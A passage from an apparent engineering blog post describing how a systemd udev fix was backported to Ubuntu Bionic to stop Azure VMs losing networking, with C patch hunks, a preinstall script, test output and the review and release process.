be considered for SRU.</p>
<p>The logging ones are worse:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit ab54f12b783eea891d6414fbc14cd6fe7cbe4c80
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Wed, 9 Sep 2020 02:10:27 +0900
Subject: sd-device: make log_device_error() or friends return void
Link: https://github.com/systemd/systemd/commit/ab54f12b783eea891d6414fbc14cd6fe7cbe4c80
commit edee65a6a4f646b6812aa29fb9bf4f71c313981e
From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
Date: Fri, 17 Dec 2021 11:43:26 +0100
Subject: udev/net_id: add debug logging for construction of device
names
Link: https://github.com/systemd/systemd/commit/edee65a6a4f646b6812aa29fb9bf4f71c313981e
</code></pre></div></div>
<p>So, we cannot backport these commits just to get some functions required for a
fix, no matter how critical the fix is. We are going to have to come up with
another backport, functionally the same, that uses only the functions
present in the Bionic implementation of systemd.</p>
<p>This is when I was very pleased to have the fixes from Focal and Groovy to study.</p>
<p>Let’s have a look at Dan Streetman’s backport to Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1902960
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
rules.d/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 30 +++++++++++++++++++++++++++---
2 files changed, 28 insertions(+), 4 deletions(-)
--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_e
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -10,6 +10,7 @@
#include "conf-files.h"
#include "conf-parser.h"
#include "def.h"
+#include "device-private.h"
#include "device-util.h"
#include "ethtool-util.h"
#include "fd-util.h"
@@ -351,6 +352,7 @@ int link_config_apply(link_config_ctx *c
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed, name_type = NET_NAME_UNKNOWN;
NamePolicy policy;
int r, ifindex;
@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
if (r < 0)
return r;
+ r = device_get_action(device, &a);
+ if (r < 0)
+ log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
config->autonegotiation, config->advertise,
config->speed, config->duplex, config->port);
@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
goto no_rename;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+ new_name = old_name;
+ goto no_rename;
+ }
+
if (ctx->enable_name_policy && config->name_policy)
for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
policy = *p;
</code></pre></div></div>
<p>Okay, this is much more reasonable. This time around, we still use
<code class="language-plaintext highlighter-rouge">device_get_action()</code> and <code class="language-plaintext highlighter-rouge">log_device_debug()</code>, but we now set <code class="language-plaintext highlighter-rouge">*name = old_name;</code>
or <code class="language-plaintext highlighter-rouge">new_name = old_name;</code> and <code class="language-plaintext highlighter-rouge">goto no_rename;</code> instead of calling
<code class="language-plaintext highlighter-rouge">r = sd_device_get_sysname(device, ret_name);</code>.</p>
<p>Since we have <code class="language-plaintext highlighter-rouge">new_name = old_name;</code>, we can use this knowledge to help us build the
backport to Bionic.</p>
<p>Even better, Dan Streetman left us a note:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
</code></pre></div></div>
<p>Both of these hints would turn out to be crucial.</p>
<p>The first thing we need to figure out is how to get the device action, in the
form of the <code class="language-plaintext highlighter-rouge">DeviceAction</code> enum.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef enum DeviceAction {
DEVICE_ACTION_ADD,
DEVICE_ACTION_REMOVE,
DEVICE_ACTION_CHANGE,
DEVICE_ACTION_MOVE,
DEVICE_ACTION_ONLINE,
DEVICE_ACTION_OFFLINE,
DEVICE_ACTION_BIND,
DEVICE_ACTION_UNBIND,
_DEVICE_ACTION_MAX,
_DEVICE_ACTION_INVALID = -1,
} DeviceAction;
</code></pre></div></div>
<p>We have the enum, which is something, so we can go ahead and add the hunks:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -25,6 +25,8 @@
#include "alloc-util.h"
#include "conf-files.h"
#include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
#include "ethtool-util.h"
#include "fd-util.h"
#include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed;
int r, ifindex;
</code></pre></div></div>
<p>Next, let’s look at <code class="language-plaintext highlighter-rouge">r = device_get_action(device, &a);</code></p>
<p>We are taking <code class="language-plaintext highlighter-rouge">struct udev_device</code> as <code class="language-plaintext highlighter-rouge">device</code>, and getting the <code class="language-plaintext highlighter-rouge">DeviceAction</code>
from it, and sticking it in <code class="language-plaintext highlighter-rouge">a</code>.</p>
<p>I came across <code class="language-plaintext highlighter-rouge">udev_device_get_action()</code> which returns a string:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>src/libudev/libudev.h:107:const char *udev_device_get_action(struct udev_device *udev_device);
</code></pre></div></div>
<p>This gets us halfway there. Searching further around the <code class="language-plaintext highlighter-rouge">DeviceAction</code> parent
header file, <code class="language-plaintext highlighter-rouge">device-internal.h</code>, we find:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceAction device_action_from_string(const char *s) _pure_;
</code></pre></div></div>
<p>which is exactly what we want. Thus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r = device_get_action(device, &a);
</code></pre></div></div>
<p>becomes</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>a = device_action_from_string(udev_device_get_action(device));
</code></pre></div></div>
<p>Quite a tidy backport, if I do say so myself. Now we can reuse the set check and
the if statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
</code></pre></div></div>
<p>and also:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (a == DEVICE_ACTION_MOVE) {
</code></pre></div></div>
<p>keeping the spirit and intention of the upstream commit.</p>
<p>Now, let’s look at the first major hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
</code></pre></div></div>
<p>Comparing this with Dan Streetman’s first hunk for Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
if (r < 0)
return r;
+ r = device_get_action(device, &a);
+ if (r < 0)
+ log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
config->autonegotiation, config->advertise,
config->speed, config->duplex, config->port);
</code></pre></div></div>
<p>I came up with the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
if (!old_name)
return -EINVAL;
+ a = device_action_from_string(udev_device_get_action(device));
+ if (a < 0)
+ log_warning_errno(errno, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
</code></pre></div></div>
<p>We check <code class="language-plaintext highlighter-rouge">a</code> instead of <code class="language-plaintext highlighter-rouge">r</code>, and we change <code class="language-plaintext highlighter-rouge">log_device_debug</code> to a plain
<code class="language-plaintext highlighter-rouge">log_debug</code>, manually supplying the device name via <code class="language-plaintext highlighter-rouge">udev_device_get_sysname(device)</code>.
We also reuse Dan Streetman’s idea of <code class="language-plaintext highlighter-rouge">*name = old_name</code> and <code class="language-plaintext highlighter-rouge">return 0</code>.</p>
<p>For the second hunk, we do something similar:</p>
<p>The original hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
if (r < 0)
return r;
- r = link_config_generate_new_name(ctx, config, device, &new_name);
- if (r < 0)
- return r;
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, &new_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+ } else {
+ r = link_config_generate_new_name(ctx, config, device, &new_name);
+ if (r < 0)
+ return r;
+ }
r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
if (r < 0)
</code></pre></div></div>
<p>Dan Streetman’s backport for Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
goto no_rename;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+ new_name = old_name;
+ goto no_rename;
+ }
+
if (ctx->enable_name_policy && config->name_policy)
for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
policy = *p;
</code></pre></div></div>
<p>and what I came up with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
return -ENODEV;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
</code></pre></div></div>
<p>We keep the same sort of structure as Dan Streetman, but since the <code class="language-plaintext highlighter-rouge">no_rename</code> label
does not exist in Bionic, we simply <code class="language-plaintext highlighter-rouge">return 0</code> early.</p>
<p>and thus, we have the final patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
rules/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 20 ++++++++++++++++++++
2 files changed, 21 insertions(+), 1 deletion(-)
diff --git a/rules/80-net-setup-link.rules b/rules/80-net-setup-link.rules
index 6e411a9..bafc3fb 100644
--- a/rules/80-net-setup-link.rules
+++ b/rules/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index a4368f0..4c7e87d 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -25,6 +25,8 @@
#include "alloc-util.h"
#include "conf-files.h"
#include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
#include "ethtool-util.h"
#include "fd-util.h"
#include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed;
int r, ifindex;
@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
if (!old_name)
return -EINVAL;
+ a = device_action_from_string(udev_device_get_action(device));
+ if (a < 0)
+ log_warning_errno(errno, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
return -ENODEV;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
--
2.34.1
</code></pre></div></div>
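<p>Turning a patch like this into a test build is the usual source-upload dance;
roughly the following, with a hypothetical PPA name and version suffix:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ debuild -S -sa    # build a signed source package with the patch applied
$ dput ppa:some-user/lp1988119-test ../systemd_237-3ubuntu10.55~ppa1_source.changes
</code></pre></div></div>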
<p>I quickly got a test package building in a PPA, and eagerly attempted to
reproduce the issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger && sudo systemctl restart systemd-networkd
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms
</code></pre></div></div>
<p>I was relieved. The fix worked as intended, and we fixed the bug.
I then created a proper debdiff, and uploaded it to the Launchpad bug as
systemd 237-3ubuntu10.55.</p>
<p><a href="https://launchpadlibrarian.net/621043086/lp1988119_bionic.debdiff">debdiff for systemd 237-3ubuntu10.55</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd (237-3ubuntu10.55) bionic; urgency=medium
* d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
Run net_setup_link on 'change' uevents, important for users of the
hv_netvsc driver on Azure. (LP: #1988119)
-- Matthew Ruffell <matthew.ruffell@canonical.com> Wed, 31 Aug 2022 16:35:20 +1200
</code></pre></div></div>
<p>With a full SRU template on the Launchpad bug description, this was ready to
go.</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119">SRU template</a></p>
<p>I messaged Nishit on Mattermost, and we got this built and placed into the
ubuntu-security-proposed PPA, since this was going through -security, and not
-updates.</p>
<p>By the time the package hit ubuntu-security-proposed, we were about 8 hours into
my day, and since the issue was no longer absolutely critical, I decided to
err on the side of caution and ask the Microsoft Azure engineers to review
and sign off on the packages in -proposed.</p>
<p>Looking back, this decision to wait for stakeholder signoff before release was
one of the most important decisions in this whole case.</p>
<h2 id="udev-preinstall-script">udev Preinstall Script</h2>
<p>Microsoft got back to us the next morning, confirming that the fix worked as
intended and was robust.</p>
<p>But.</p>
<p>Well, the fix is only robust on systems that have been rebooted, or are
<strong>non-primed</strong>. That is, systems that haven’t lost <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, or have
recovered it already.</p>
<p>If a system had already lost <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, for example, by installing
<code class="language-plaintext highlighter-rouge">open-vm-tools</code> and not yet installing the benign systemd security update,
the failure would still occur.</p>
<p>If we had rushed and released systemd 237-3ubuntu10.55 as it was, it would have
likely taken Bionic VMs running on Azure down for a second time.</p>
<p>So, we needed a plan to fix all the machines that are currently ‘primed’.
Microsoft suggested a preinstall script like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pushd /sys/class/net
for i in *; do
echo -n "Checking $i: "
if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
echo "executing trigger on link $i to add ID_NET_DRIVER."
udevadm trigger -c add -y $i
fi
done
popd
</code></pre></div></div>
<p>What it did was, for every network device, grep for <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, and if it
was missing, issue an <code class="language-plaintext highlighter-rouge">ADD</code> uevent to the device.</p>
<p>This would certainly fix the issue, but I was initially very concerned about
running this script on not just every single VM running on Azure, but the whole
Bionic cohort, from bare metal to KVM VMs to VirtualBox to AWS to GCP to Oracle Cloud.
I was quite anxious at the thought, since I didn’t know if issuing a bunch
of <code class="language-plaintext highlighter-rouge">ADD</code> uevents to every Bionic machine in the wild would cause any additional
problems, or a regression.</p>
<p>Instead, I wanted a much safer, more targeted fix: a udev rule
like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/etc/udev/rules.d/67-azure-network.rules:
SUBSYSTEM=="net", SUBSYSTEMS=="vmbus", DRIVERS=="hv_netvsc", ENV{ID_NET_DRIVER}="hv_netvsc"
</code></pre></div></div>
<p>This would directly target Azure VMs only, and it would directly target <code class="language-plaintext highlighter-rouge">hv_netvsc</code>
devices. I suggested we ship this in the walinuxagent package, but there were
additional issues, such as needing to call
<code class="language-plaintext highlighter-rouge">udevadm control --reload-rules && udevadm trigger</code> to make the rule apply,
so we would need to add that in, or make upgrading the udev package do it.</p>
<p>That causes further problems: we would force-reload all rules during an
upgrade and apply them, triggering the very event that caused the issue in the
first place, and it would override manually changed udev rules with system file
rules, which could create problems for some running systems.</p>
<p>There were also other problems with the udev rule itself, such as it only replacing
<code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code> when we had also lost additional attributes, and the fact that
the rule would then have to persist forever.</p>
<p>After discussing this with Microsoft engineers, we all decided that the
preinstall script was the best way forward.</p>
<p>I wrote up a proof of concept to ensure it only gets called once, on upgrade
from any package below systemd 237-3ubuntu10.56, so there is only one upgrade
where we have to worry about regression risk from <code class="language-plaintext highlighter-rouge">ADD</code> uevents. I wrapped it
in a function, and made sure the call that issues the <code class="language-plaintext highlighter-rouge">ADD</code> uevent always
returns <code class="language-plaintext highlighter-rouge">true</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst 2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst 2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
fi
}
+check_ID_NET_DRIVER() {
+ # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+ for i in $(ls /sys/class/net); do
+ echo -n "Checking $i: "
+ if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
+ echo "Executing trigger on link $i to add ID_NET_DRIVER."
+ udevadm trigger -c add -y $i || true
+ fi
+ done
+}
+
check_version() {
# $2 is non-empty when installing from the "config-files" state
[ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
udevadm control --log-priority=0 || true
fi
fi # 204-4
+
+ if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+ check_ID_NET_DRIVER
+ fi # 237-3ubuntu10.56
}
case "$1" in
</code></pre></div></div>
<p>This worked great in a test package. It did generate a bit of output though:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Preparing to unpack .../udev_237-3ubuntu10.55+sf343528v20220906b3_amd64.deb ...
Checking enP50633s1: Executing trigger on link enP50633s1 to add ID_NET_DRIVER.
Checking eth0: Executing trigger on link eth0 to add ID_NET_DRIVER.
Checking lo: Executing trigger on link lo to add ID_NET_DRIVER.
Unpacking udev (237-3ubuntu10.55+sf343528v20220906b3) over (237-3ubuntu10.53) ...
</code></pre></div></div>
<p>Checking the package upgrade on an already primed system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
$ sudo apt update
$ sudo apt install libnss-systemd libpam-systemd libsystemd0 libudev1 systemd systemd-sysv udev
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms
</code></pre></div></div>
<p>At this point, I was quite worried about the impact of issuing an <code class="language-plaintext highlighter-rouge">ADD</code> uevent
on all Bionic systems, so I made my second best decision in this case:</p>
<p>Asking for help.</p>
<p>I wrote an email to the Foundations, Server, Security, and Sustaining
Engineering teams, explaining the root cause, the minimal reproducer, and the
choice to go with the preinstall script instead of a udev rule.</p>
<p>I asked for any and all advice, from issuing <code class="language-plaintext highlighter-rouge">ADD</code> uevents at mass scale, to
code review of the preinstall script, to the general approach.</p>
<p>I got several replies.</p>
<p>The first was from Christian Ehrhardt of the Server team, whom I have asked for
help a few times over the years, and from whom I have always received well thought out,
expert advice.</p>
<p>Christian pointed out that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ for i in $(ls /sys/class/net); do
+ echo -n "Checking $i: "
</code></pre></div></div>
<p>will be too noisy. His own laptop had 17 entries, and since every bridge, veth,
and vpn will also be there, larger servers could very well have hundreds of
entries. Christian suggested that we log once that devices are re-probed, and
then log to a file with logger for each device that actually gets modified.</p>
<p>Christian also suggested using <code class="language-plaintext highlighter-rouge">udevadm settle</code> to avoid any potential
thunderstorms on larger, busier servers when we call <code class="language-plaintext highlighter-rouge">udevadm trigger -c add</code>
in rapid succession.</p>
<p>Christian also pointed out that <code class="language-plaintext highlighter-rouge">/sys/class/net/lo</code> will not have a driver, and
can be skipped rather than re-added.</p>
<p>Next, Alex Murray from the Security Team wrote back, and suggested we use a
glob instead of ls to get the devices, and also omit <code class="language-plaintext highlighter-rouge">lo</code> like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for i in /sys/class/net/[!lo]*; do
</code></pre></div></div>
<p>Finally, my colleague Mauricio Oliveira chimed in, and offered some thought-provoking
advice on the benefits and pitfalls of using <code class="language-plaintext highlighter-rouge">ADD</code> uevents instead
of <code class="language-plaintext highlighter-rouge">CHANGE</code>.</p>
<p>I took everyone’s advice on board, and pondered the more theoretical problems
that had been raised. The result of everyone’s feedback and a bit more
tweaking is the final debdiff for systemd 237-3ubuntu10.56:</p>
<p><a href="https://launchpadlibrarian.net/622189118/lp1988119_bionic_part_two_V2.debdiff">debdiff for systemd 237-3ubuntu10.56</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/changelog systemd-237/debian/changelog
--- systemd-237/debian/changelog 2022-08-31 16:35:20.000000000 +1200
+++ systemd-237/debian/changelog 2022-09-06 15:18:05.000000000 +1200
@@ -1,3 +1,12 @@
+systemd (237-3ubuntu10.56) bionic; urgency=medium
+
+ * debian/udev.preinst:
+ Add check_ID_NET_DRIVER() to ensure that on upgrade or install
+ from an earlier version ID_NET_DRIVER is present on network
+ interfaces. (LP: #1988119)
+
+ -- Matthew Ruffell <matthew.ruffell@canonical.com> Tue, 06 Sep 2022 15:18:05 +1200
+
systemd (237-3ubuntu10.55) bionic; urgency=medium
* d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst 2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst 2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
fi
}
+check_ID_NET_DRIVER() {
+ # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+ for i in /sys/class/net/[!lo]*; do
+ if ! (udevadm info $i | grep --silent ID_NET_DRIVER); then
+ logger --id=$$ --priority=user.info "udev.preinst: Executing trigger on link $(basename $i) to add ID_NET_DRIVER."
+ udevadm trigger -c add -y $(basename $i) || true
+ fi
+ done
+ udevadm settle || true
+}
+
check_version() {
# $2 is non-empty when installing from the "config-files" state
[ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
udevadm control --log-priority=0 || true
fi
fi # 204-4
+
+ if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+ check_ID_NET_DRIVER
+ fi # 237-3ubuntu10.56
}
case "$1" in
</code></pre></div></div>
<p>This was then built and uploaded to the ubuntu-security-proposed ppa, and I
again tested it on Azure, and it worked like a charm.</p>
<p>From there, I submitted the package to Microsoft for validation from their
engineers, and while I was waiting, began testing systemd 237-3ubuntu10.56 in
every way imaginable.</p>
<p>The next day we got the okay from Microsoft, and we agreed on a release date
for the package, Tuesday 14th September APAC time.</p>
<p>It was currently Saturday, and I was working the APAC weekend shift, so
I began testing the package on bare metal, KVM, Xen, AWS, GCP, and Azure, with
as many quirks and oddities as I could imagine.</p>
<p>The package was also subjected to the automated autopkgtests on our internal
infrastructure, and passed all tests.</p>
<p>When Tuesday came around, it was time to follow through and release the update.
Even after spending my entire weekend shift testing, I was still
a little anxious, due to the nature of the changes involved, the overall risk
of regression and the impact a regression could have.</p>
<p>Since the package was being released to -security, unattended-upgrades would
install it as soon as it was published, and if I had made any mistake at all,
at minimum we were looking at causing another complete outage on Azure, and at
worst, bringing down every Bionic system.</p>
<p>In the end, the update went out smoothly. The preinstall script successfully
fixed up primed machines, and the permanent fix to the systemd codebase was
correct and true, preventing the issue from happening again.</p>
<p>The update was released without any fanfare, with no media coverage, and I
couldn’t have been any happier.</p>
